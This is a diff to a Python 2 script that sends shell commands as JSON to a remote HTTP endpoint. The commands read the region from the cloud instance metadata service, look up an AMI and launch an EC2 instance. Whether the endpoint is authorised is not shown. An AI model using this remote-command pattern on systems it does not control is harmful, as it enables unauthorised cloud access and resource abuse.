@@ -256,11 +256,25 @@ else:
    result=json.loads(result[4][0])
    sec_group_id=result['GroupId']
 time.sleep( 1 )
-#print "SO FAR SO GOOD\n";
+print "   Continuing . . .\n";
 #sys.exit()
-keynm = re.sub(r'\.pem$','',args.pem_file)
-new_inst = 'aws ec2 run-instances --image-id ami-c229c0a2 --count=1 ' + \
-           '--key-name ' + keynm + ' ' + \
+region = "wget -qO- http://169.254.169.254/latest/dynamic/instance-identity/document|grep region"
+data = {'cmd': [['cmd',region]]}
+headerz, content = http.request(url, "POST", body=dumps(data), headers=headers)
+result = json.loads(content)
+result = json.loads(result['result'])
+region=re.search(': "(.+)"',result[0][0]).group(1)
+time.sleep(1)
+get_inst = 'aws ec2 describe-images --owners self amazon --filters "Name=root-device-type,Values=ebs" "Name=virtualization-type,Values=hvm" "Name=architecture,Values=x86_64" "Name=block-device-mapping.volume-size,Values=8" "Name=block-device-mapping.volume-type,Values=gp2" "Name=state,Values=available" --region='+region
+data = {'cmd': [['cmd',get_inst]]}
+headerz, content = http.request(url, "POST", body=dumps(data), headers=headers)
+result = json.loads(content)
+result = json.loads(result['result'])
+result = json.loads(result[0][0])
+imagid = result['Images'][0]['ImageId']
+keynam = re.sub(r'\.pem$','',args.pem_file)
+new_inst = 'aws ec2 run-instances --image-id '+imagid+' --count=1 ' + \
+           '--key-name ' + keynam + ' ' + \
            '--instance-type=t2.micro --security-group-ids ' + \
            sec_group_id + ' --subnet-id ' + sid
 data = {'cmd': [['cmd',new_inst]]}
